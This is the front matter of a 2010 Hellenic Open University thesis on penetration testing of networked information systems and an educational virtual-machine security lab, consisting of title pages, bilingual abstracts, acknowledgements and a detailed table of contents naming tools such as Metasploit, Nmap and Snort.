306
ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ ΔΙΠΛΩΜΑΤΙΚΗ ΕΡΓΑΣΙΑ HOU-CS-UGP-2010-03 «ΕΛΕΓΧΟΣ ΤΡΩΤΟΤΗΤΑΣ ΔΙΚΤΥΟΚΕΝΤΡΙΚΩΝ ΠΛΗΡΟΦΟΡΙΑΚΩΝ ΣΥΣΤΗΜΑΤΩΝ» ΚΑΛΑΜΠΟΥΝΙΑ ΜΑΡΙΑ ΧΡΙΣΤΙΝΑ ΕΠΙΒΛΕΠΩΝ ΚΑΘΗΓΗΤΗΣ: ΓΚΡΙΤΖΑΛΗΣ ΔΗΜΗΤΡΙΟΣ ΠΑΤΡΑ 2010

ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Embed Size (px)

Citation preview

Page 1: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ

ΔΙΠΛΩΜΑΤΙΚΗ ΕΡΓΑΣΙΑ HOU-CS-UGP-2010-03

«ΕΛΕΓΧΟΣ ΤΡΩΤΟΤΗΤΑΣ ΔΙΚΤΥΟΚΕΝΤΡΙΚΩΝ ΠΛΗΡΟΦΟΡΙΑΚΩΝ ΣΥΣΤΗΜΑΤΩΝ»

ΚΑΛΑΜΠΟΥΝΙΑ ΜΑΡΙΑ ΧΡΙΣΤΙΝΑ

ΕΠΙΒΛΕΠΩΝ ΚΑΘΗΓΗΤΗΣ: ΓΚΡΙΤΖΑΛΗΣ ΔΗΜΗΤΡΙΟΣ ΠΑΤΡΑ 2010

Page 2: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

2 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Page 3: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

3 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Πτυχιακή Εργασία HOU-CS-UGP-2010-03

Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών

Συστημάτων Καλαμπούνια Μαρία Χριστίνα

Page 4: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

4 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

© ΕΑΠ, 2010 Η παρούσα διατριβή, η οποία εκπονήθηκε στα πλαίσια της ΘΕ ΠΛΗ40, και τα λοιπά αποτελέσματα της αντίστοιχης Πτυχιακής Εργασίας (ΠΕ) αποτελούν συνιδιοκτησία του ΕΑΠ και της φοιτήτριας, ο καθένας από τους οποίους έχει το δικαίωμα ανεξάρτητης χρήσης και αναπαραγωγής τους (στο σύνολο ή τμηματικά) για διδακτικούς και ερευνητικούς σκοπούς, σε κάθε περίπτωση αναφέροντας τον τίτλο και το συγγραφέα και το ΕΑΠ όπου εκπονήθηκε η ΠΕ καθώς και τον επιβλέποντα και την επιτροπή κρίσης.

Page 5: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

5 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Έλεγχος Τρωτότητας Δικτυοκεντρικών Πληροφοριακών Συστημάτων

Καλαμπούνια Μαρία Χριστίνα

Γκρίτζαλης Δημήτριος

Καθηγητής Οικονομικό

Πανεπιστήμιο Αθηνών

Σκόδρας Αθανάσιος Καθηγητής

Ελληνικό Ανοιχτό Πανεπιστήμιο

Μαυρίδης Ιωάννης Επίκουρος Καθηγητής

Πανεπιστήμιο Μακεδονίας

Περίληψη

Σκοπός

Η παρούσα πτυχιακή εργασία έχει ως στόχο, αφ’ ενός τη μελέτη των μεθόδων και των

τεχνικών που χρησιμοποιούν οι επιτιθέμενοι για να εκμεταλλευτούν τις ευπάθειες ενός

πληροφοριακού συστήματος, αφετέρου τη δημιουργία ενός εργαστηρίου ασφάλειας για τον

Έλεγχο της Τρωτότητας (Penetration Testing) δικτυοκεντρικών πληροφορικών συστημάτων

για εκπαιδευτικούς σκοπούς.

Μεθοδολογία Αρχικά μελετώνται τα χαρακτηριστικά των επιτιθέμενων, οι τρόποι εργασίας τους, οι

μεθοδολογίες, οι τεχνικές και οι τύποι επιθέσεων που χρησιμοποιούν.

Στη συνέχεια, αναλύεται η έννοια του Ελέγχου Τρωτότητας (Penetration Testing), οι

μέθοδοι διενέργειας των ελέγχων, τα στάδια που ακολουθούνται και οι διαχείρισή τους από

αυτούς που τους διενεργούν.

Το εκπαιδευτικό εργαστήριο Ελέγχου Τρωτότητας το οποίο αναπτύχθηκε στα πλαίσια αυτής

της εργασίας αξιοποιεί την τεχνολογία των εικονικών μηχανών, ενώ τα εργαλεία που

χρησιμοποιήθηκαν για τη δημιουργία των ασκήσεων είναι είτε ανοιχτού κώδικα, είτε

Page 6: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

6 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

ελεύθερα προς χρήση. Τα χαρακτηριστικά, η δομή και οι απαιτήσεις του εργαστηρίου καθώς

και τα χαρακτηριστικά, οι δυνατότητες, οι περιορισμοί, οι παρενέργειες, όπως και ο τρόπος

λειτουργίας των εργαλείων περιγράφονται εκτενώς.

Οι εργαστηριακές ασκήσεις έχουν σχεδιαστεί με σκοπό να διευκολύνουν τον εισηγητή και

τους σπουδαστές στην πραγματοποίησή τους, να έχουν αυξανόμενο βαθμό δυσκολίας, να

αξιοποιούν τις δυνατότητες των εργαλείων που μελετώνται, και, τέλος, να επιτρέπουν την

τροποποίηση και προσαρμογή τους στις εκάστοτε γνωστικές απαιτήσεις.

Τέλος, παρουσιάζονται τα πλεονεκτήματα και τα μειονεκτήματα του εργαστηρίου που

δημιουργήθηκε και προτείνεται ένας τρόπος εφαρμογής του.

Η παρούσα πτυχιακή εργασία είναι οργανωμένη σε 7 κεφάλαια. Στο 1ο κεφάλαιο αναλύεται η έννοια της ασφάλειας πληροφοριακών συστημάτων και η

εξελικτική της πορεία, διερευνώνται τα αίτια για τα οποία δεν είναι ασφαλή τα

πληροφοριακά συστήματα και τονίζεται η αναγκαιότητα ύπαρξης Πολιτικής Ασφάλειας.

Το 2ο κεφάλαιο μελετά το φαινόμενο του Hacking και την εξελικτική του πορεία, ενόσω

αναλύει τους τρόπους επίθεσης των Hackers, τις μεθοδολογίες και τις τεχνικές που

χρησιμοποιούν, καθώς και τους τύπους των επιθέσεων.

Στο 3ο κεφάλαιο αναλύεται η έννοια του Ελέγχου Τρωτότητας (Penetration Testing), ενώ

παρουσιάζονται οι μέθοδοι και τα στάδια διενέργειας τους, καθώς και ο τρόπος διαχείρισής

τους.

Στο 4ο κεφάλαιο παρουσιάζονται και αναλύονται εκτενώς τα εργαλεία τα οποία θα

χρησιμοποιηθούν στο εργαστήριο.

Στο 5ο κεφάλαιο περιγράφεται η δομή, τα χαρακτηριστικά, οι απαιτήσεις και ο τρόπος

λειτουργίας του εκπαιδευτικού εργαστηρίου ασφάλειας.

Στο 6ο κεφάλαιο παρουσιάζονται οι εργαστηριακές ασκήσεις που αναπτύχθηκαν για τη

λειτουργία του εργαστηρίου.

Στο 7ο κεφάλαιο γίνεται μια ανασκόπηση της εργασίας, εντοπίζονται τα πλεονεκτήματα και

τα μειονεκτήματα του εργαστηρίου που αναπτύχθηκε, προτείνονται τρόποι εφαρμογής του

και εξάγονται τα συμπεράσματα της εργασίας.

Λέξεις - κλειδιά: Έλεγχος Τρωτότητας, Εργαστήριο Ασφάλειας, Εργαστηριακές Ασκήσεις

Ασφάλειας Πληροφοριακών Συστημάτων

Page 7: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

7 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Penetration Testing of Network-Based Information Systems

Kalampounia Maria Christina

Gritzalis Dimitrios Skodras Athanassios

Mavridis Ioannis Professor

Athens University of

Economics and Business

Professor

Hellenic Open University

Assistant Professor

University of Macedonia

Summary

Scope

The objective of this thesis is, on the one hand the study of the methods and techniques that

attackers use in order to exploit information systems vulnerabilities, and, on the other hand,

to create a penetration testing security laboratory of network-based information systems for

educational purposes.

Methodology

Initially, this study focuses on the characteristics of the attackers, as well as their ways of

acting, the methodologies, the techniques and the types of attacks that they use.

Afterwards, the significance of Penetration Testing is analyzed, as well as the testing steps

and the methodology and their management by the persons that conduct them.

The educational Penetration Testing laboratory, which was developed in this project, utilizes

the advantages of virtualization technology, while the tools that were used for the

development of the exercises are opens source, or freely to use. The characteristics, the

structure and the requirements of the laboratory, as well as the characteristics, the

Page 8: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

8 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

possibilities, the limitations, the side effects, as also the tools functionality are extensively

described.

The laboratorial exercises have been designed in order to facilitate both the instructor and

the students, to have an increasing difficulty’s scale, to utilize the possibilities of tools and,

additionally, to allow the modification and adaptation in each cognitive requirement.

Finally, the advantages and the disadvantages of the laboratory are presented and we propose

a way for the laboratory implementation.

This thesis is organized in 7 chapters.

Chapter 1 analyzes the significance of information systems security and its progress, the

reasons why the Information Systems are not secure are investigated, and also points the

necessity of the existence of a security policy.

Chapter 2 studies the phenomenon of Hacking and its progress, analyzes the ways of

Hackers attack, the methodologies and the techniques that they use, as well as the types of

attacks.

In chapter 3, the significance of Penetration Testing is analyzed, as well as the testing steps

and the methodology and their management by the persons that conduct them..

In chapter 4, the tools which will be used in the laboratory are extensively presented and

analyzed.

Chapter 5, the structure, the characteristics, the requirements and the educational security

laboratory implementation are described.

In chapter 6, the laboratorial exercises that were developed are presented.

In chapter 7, a review of the thesis is presented, as well as the advantages, and

disadvantages of laboratory that was developed. Finally implementation suggestions are

proposed and the thesis conclusions are presented.

Keywords: Penetration Testing, Security Laboratory, Information Systems Security

Laboratorial Exercises

Page 9: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

9 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Ευχαριστίες : Θερμές ευχαριστίες εκφράζω στον υπεύθυνο και επιβλέποντα της εργασίας μου, Καθηγητή του Οικονομικού Πανεπιστημίου Αθηνών, κ. Δημήτριο Γρίτζαλη, όχι μόνον γιατί του οφείλω τη γνωριμία μου με το επιστημονικό πεδίο της Ασφάλειας Πληροφοριακών Συστημάτων, πολύ περισσότερο γιατί με το ήθος και την καλλιέργειά του υπήρξε δάσκαλος για μένα. Θα ήθελα να ευχαριστήσω επίσης, τον Υποψήφιο Διδάκτορα κ. Αλέξιο Μυλωνά για τη πολύτιμη βοήθεια και καθοδήγηση που μου παρείχε καθ’ όλη τη διάρκεια εκπόνησης της παρούσας πτυχιακής εργασίας. Επιπλέον, τις ευχαριστίες μου θα ήθελα να εκφράσω τόσο στο Ελληνικό Ανοιχτό Πανεπιστήμιο για την ευκαιρία που μου παρείχε να σπουδάσω, όσο και στους καθηγητές μου που με δίδαξαν αυτά που έμαθα. Τέλος, θέλω να ευχαριστήσω την οικογένεια μου και τα προσφιλή μου πρόσωπα για τη στήριξη που μου προσέφεραν και κυρίως για την κατανόηση που επέδειξαν καθ’ όλη τη διάρκεια των σπουδών μου.

Page 10: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

10 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Πίνακας Περιεχομένων

Περίληψη ...................................................................................................................................................... 5

Summary ....................................................................................................................................................... 7

Πίνακας Περιεχομένων ............................................................................................................................... 10

Ευρετήριο εικόνων ...................................................................................................................................... 14

Ευρετήριο πινάκων ..................................................................................................................................... 15

Πρόλογος .................................................................................................................................................... 16

Εισαγωγή .................................................................................................................................................... 17

Κεφάλαιο 1 ................................................................................................................................................. 19

Πληροφοριακά Συστήματα και Ασφάλεια .................................................................................................. 19

1.1 Εισαγωγή ....................................................................................................................................................... 19

1.2 Η έννοια της ασφάλειας πληροφοριακών συστημάτων ................................................................................... 20

1.3 Η εξελικτική πορεία της ασφάλειας πληροφοριακών συστημάτων ................................................................. 21

1.4 Γιατί τα πληροφορικά συστήματα δεν είναι ασφαλή ....................................................................................... 28

1.5 Διαχείριση Ασφάλειας – Αναγκαιότητα Ύπαρξης Πολιτικής Ασφάλειας ......................................................... 30

Κεφάλαιο 2 ................................................................................................................................................. 36

Hacking και Hackers ................................................................................................................................... 36

2.1 Τι είναι Hacking ............................................................................................................................................ 36

2.2 Hackers ......................................................................................................................................................... 36 2.2.1 Ιστορικά στοιχεία ...................................................................................................................................... 37 2.2.2 Hackers: Ιδεολογία – Κουλτούρα – Κίνητρα ............................................................................................ 39 2.2.3 Τύποι των Hackers .................................................................................................................................... 41

2.3 Τρόποι Εργασίας των Εισβολέων και Τοπολογίες Επίθεσης .......................................................................... 43 2.3.1 Τρόποι Εργασίας των Εισβολέων ............................................................................................................. 43 2.3.2 Τοπολογίες Επίθεσης ................................................................................................................................ 44

2.4 Μεθοδολογία και τεχνικές Hacking ............................................................................................................... 48 2.4.1 Αναγνώριση Στόχου (Footprinting) .......................................................................................................... 48 2.4.2 Σάρωση Συστημάτων (Scanning) .............................................................................................................. 55 2.4.3 Ενεργητική Συλλογή Πληροφοριών ή Απαρίθμηση Συστήματος (Enumeration) ..................................... 63

Page 11: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

11 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

2.5 Τύποι επιθέσεων ............................................................................................................................................ 72

Κεφάλαιο 3 ................................................................................................................................................. 75

Penetration Testing ..................................................................................................................................... 75

3.1 Τι είναι οι έλεγχοι διείσδυσης (Penetration Testing) ...................................................................................... 77

3.2 Μέθοδοι διενέργειας Ελέγχων Διείσδυσης (Penetration Testing) .................................................................. 78

3.3 Τα Στάδια Ενός Ελέγχου Διείσδυσης .............................................................................................................. 84

3.4 Διαχείριση ελέγχων διείσδυσης ...................................................................................................................... 89

3.5 Πιστοποιήσεις Αξιολογητών Ασφάλειας ......................................................................................................... 91

Κεφάλαιο 4 ................................................................................................................................................. 95

Penetration Testing Tools ........................................................................................................................... 95

4.1 Εισαγωγή ....................................................................................................................................................... 95

4.2 Κριτήρια Επιλογής Παρουσίασης Εργαλείων Penetration Testing................................................................. 97

4.3 Microsoft Baseline Security Analyzer (MBSA) .............................................................................................. 98 4.3.1 Ταυτότητα ................................................................................................................................................. 98 4.3.2 Δυνατότητες ............................................................................................................................................ 100 4.3.3 Περιορισμοί και παρενέργειες................................................................................................................. 105 4.3.4 Τρόπος λειτουργίας ................................................................................................................................. 107

4.4 Cain & Abel ................................................................................................................................................. 113 4.4.1 Ταυτότητα ............................................................................................................................................... 113 4.4.2 Δυνατότητες ............................................................................................................................................ 114 4.4.3 Περιορισμοί και παρενέργειες................................................................................................................. 126 4.4.4 Παρουσίαση - Τρόπος λειτουργίας ......................................................................................................... 128

4.5 Fast-Track ................................................................................................................................................... 131 4.5.1 Ταυτότητα ............................................................................................................................................... 131 4.5.2 Δυνατότητες ............................................................................................................................................ 131 4.5.3 Περιορισμοί και παρενέργειες................................................................................................................. 134 4.5.4 Αρχιτεκτονική και τρόπος λειτουργίας ................................................................................................... 135

4.6 Metasploit .................................................................................................................................................... 138 4.6.1 Ταυτότητα ............................................................................................................................................... 138 4.6.2 Δυνατότητες ............................................................................................................................................ 139 4.6.3 Περιορισμοί και παρενέργειες................................................................................................................. 141 4.6.4 Αρχιτεκτονική και τρόπος λειτουργίας ................................................................................................... 141

4.7 MSAT ........................................................................................................................................................... 146 4.7.1 Ταυτότητα ............................................................................................................................................... 146 4.7.2 Δυνατότητες ............................................................................................................................................ 147 4.7.3 Περιορισμοί και παρενέργειες................................................................................................................. 151 4.7.4 Αρχιτεκτονική και τρόπος λειτουργίας ................................................................................................... 152

4.8 Nessus .......................................................................................................................................................... 155 4.8.1 Ταυτότητα ............................................................................................................................................... 155 4.8.2 Δυνατότητες ............................................................................................................................................ 156 4.8.3 Περιορισμοί και παρενέργειες................................................................................................................. 160 4.8.4 Αρχιτεκτονική και τρόπος λειτουργίας ................................................................................................... 161

4.9 Nmap ........................................................................................................................................................... 167

Page 12: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

12 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

4.9.1 Ταυτότητα ............................................................................................................................................... 167 4.9.2 Δυνατότητες ............................................................................................................................................ 168 4.9.3 Περιορισμοί και παρενέργειες................................................................................................................. 172 4.9.4 Αρχιτεκτονική και τρόπος λειτουργίας ................................................................................................... 172

4.10 Paros Proxy ............................................................................................................................................ 177 4.10.1 Ταυτότητα ............................................................................................................................................. 177 4.10.2 Δυνατότητες .......................................................................................................................................... 177 4.10.3 Περιορισμοί και παρενέργειες............................................................................................................... 180 4.10.4 Αρχιτεκτονική και τρόπος λειτουργίας ................................................................................................. 181

4.11 Snort ....................................................................................................................................................... 184 4.11.1 Ταυτότητα ............................................................................................................................................. 184 4.11.2 Δυνατότητες .......................................................................................................................................... 185 4.11.3 Περιορισμοί και παρενέργειες............................................................................................................... 186 4.11.4 Αρχιτεκτονική και τρόπος λειτουργίας ................................................................................................. 187

4.12 Wireshark ............................................................................................................................................... 191 4.12.1 Ταυτότητα ............................................................................................................................................. 191 4.12.2 Δυνατότητες .......................................................................................................................................... 193 4.12.3 Περιορισμοί και παρενέργειες............................................................................................................... 194 4.12.4 Αρχιτεκτονική και τρόπος λειτουργίας ................................................................................................. 195

Κεφάλαιο 5 ............................................................................................................................................... 197

Εργαστήριο Ασφάλειας (Security Laboratory) ......................................................................................... 197

5.1 Εισαγωγή ..................................................................................................................................................... 197

5.2 Χαρακτηριστικά ενός Εργαστηρίου Ασφάλειας ............................................................................................. 198

5.3 Ανάπτυξη Εργαστηρίου Ασφάλειας ............................................................................................................... 201 5.3.1 Σκοπός του εργαστηρίου ......................................................................................................................... 201 5.3.2 Προαπαιτούμενες γνώσεις ...................................................................................................................... 202 5.3.3 Υλικοτεχνική υποδομή ............................................................................................................................ 202 5.3.4 Εκπαιδευτικό Προσωπικό – Διαχείριση Εργαστηρίου ............................................................................ 204 5.3.5 Κριτήρια ανάπτυξη και ταξινόμησης εργαστηριακών ασκήσεων ........................................................... 205 5.3.6 Αξιολόγηση Σπουδαστών........................................................................................................................ 207

Κεφάλαιο 6 ............................................................................................................................................... 208

Εργαστηριακές ασκήσεις .......................................................................................................................... 208

6.1 Εισαγωγή ..................................................................................................................................................... 208

6.2 Microsoft Baseline Security Analyzer (MBSA) ............................................................................................ 209 6.2.1 Εισαγωγική Άσκηση ............................................................................................................................... 209 6.2.2 Μέτριας Εντάσεως Άσκηση .................................................................................................................... 211 6.2.3 Σύνθετη Άσκηση ..................................................................................................................................... 213

6.3 Cain & Abel ................................................................................................................................................. 215 6.3.1 Εισαγωγική Άσκηση .......................................................................................................................... 215 6.3.2 Μέτριας Εντάσεως Άσκηση .............................................................................................................. 220 6.3.3 Σύνθετη Άσκηση ..................................................................................................................................... 223

6.4 Fast-Track ................................................................................................................................................... 226 6.4.1 Εισαγωγική Άσκηση .......................................................................................................................... 226 6.4.2 Μέτριας Εντάσεως Άσκηση .............................................................................................................. 228 6.4.3 Σύνθετη Άσκηση ..................................................................................................................................... 231

Page 13: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

13 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

6.5 Metasploit .................................................................................................................................................... 233 6.5.1 Εισαγωγική Άσκηση ............................................................................................................................... 233 6.5.2 Μέτριας Εντάσεως Άσκηση .................................................................................................................... 235 6.5.3 Σύνθετη Άσκηση ..................................................................................................................................... 238

6.6 MSAT ........................................................................................................................................................... 241 6.6.1 Εισαγωγική Άσκηση ............................................................................................................................... 241 6.6.2 Μέτριας Εντάσεως Άσκηση .................................................................................................................... 244 6.6.3 Σύνθετη Άσκηση ..................................................................................................................................... 247

6.7 Nessus .......................................................................................................................................................... 251 6.7.1 Εισαγωγική Άσκηση ............................................................................................................................... 251 6.7.2 Μέτριας Εντάσεως Άσκηση .................................................................................................................... 253 6.7.3 Σύνθετη Άσκηση ................................................................................................................................ 255

6.8 Nmap ........................................................................................................................................................... 257 6.8.1 Εισαγωγική Άσκηση ............................................................................................................................... 257 6.8.2 Μέτριας Εντάσεως Άσκηση .................................................................................................................... 260 6.8.3 Σύνθετη Άσκηση ................................................................................................................................ 264

6.9 Paros Proxy ................................................................................................................................................. 267 6.9.1 Εισαγωγική Άσκηση .......................................................................................................................... 267 6.9.2 Μέτριας Εντάσεως Άσκηση .................................................................................................................... 270 6.9.3 Σύνθετη Άσκηση ..................................................................................................................................... 273

6.10 Snort ....................................................................................................................................................... 276 6.10.1 Εισαγωγική Άσκηση ............................................................................................................................. 276 6.10.2 Μέτριας Εντάσεως Άσκηση .................................................................................................................. 280 6.10.3 Σύνθετη Άσκηση ................................................................................................................................... 282

6.11 Wireshark ............................................................................................................................................... 286 6.11.1 Εισαγωγική Άσκηση ............................................................................................................................. 286 6.11.2 Μέτριας Εντάσεως Άσκηση .................................................................................................................. 289 6.11.3 Σύνθετη Άσκηση ................................................................................................................................... 292

Κεφάλαιο 7 ............................................................................................................................................... 295

Σύνοψη και Μελλοντική Έρευνα .............................................................................................................. 295

7.1 Σύνοψη Εργαστηρίου Ασφάλειας. Πλεονεκτήματα - Μειονεκτήματα ............................................................ 295

7.2 Πρόταση εφαρμογής του εργαστηρίου .......................................................................................................... 297

7.3 Προτάσεις Μελλοντικής Έρευνας ................................................................................................................. 298

7.4 Συμπεράσματα ............................................................................................................................................. 299

Επίλογος .................................................................................................................................................... 300

Βιβλιογραφία ........................................................................................................................................... 301

Page 14: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

14 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Ευρετήριο εικόνων Εικόνα 1.1: Ιστορική εξέλιξη της ασφάλειας υπολογιστών .......................................................................... 26 Εικόνα 1.2: Αντιληπτικό Μοντέλο της Επικινδυνότητας .............................................................................. 31 Εικόνα 2.1: Επίθεση Ένα προς Ένα (One to One). ..................................................................................... 45 Εικόνα 2.2: Επίθεση Ένα προς Πολλούς (One to Many). ............................................................................ 46 Εικόνα 2.3: Επίθεση Πολλοί προς Ένα (Many to One). .............................................................................. 47 Εικόνα 2.4: Επίθεση Πολλοί προς Πολλά (Many to Many) ......................................................................... 48 Εικόνα 2.5: Διαδικασία τριών βημάτων σύνδεσης TCP .............................................................................. 59 Εικόνα 2.6: Τα 14 Σοβαρότερα Προβλήματα Ασφάλειας ............................................................................ 71 Εικόνα 3.1: Είδη Ελέγχων Τρωτότητας ....................................................................................................... 83 Εικόνα 3.2: Τα 4 Στάδια του ελέγχου διείσδυσης ......................................................................................... 85 Εικόνα 3.3: Βήματα Φάσης Επίθεσης με Ανατροφοδότηση της Φάσης Ανίχνευσης .................................... 86 Εικόνα 4.1: Κεντρική οθόνη του MBSA..................................................................................................... 107 Εικόνα 4.2: Μενού επιλογών σάρωσης ενός υπολογιστή ........................................................................... 107 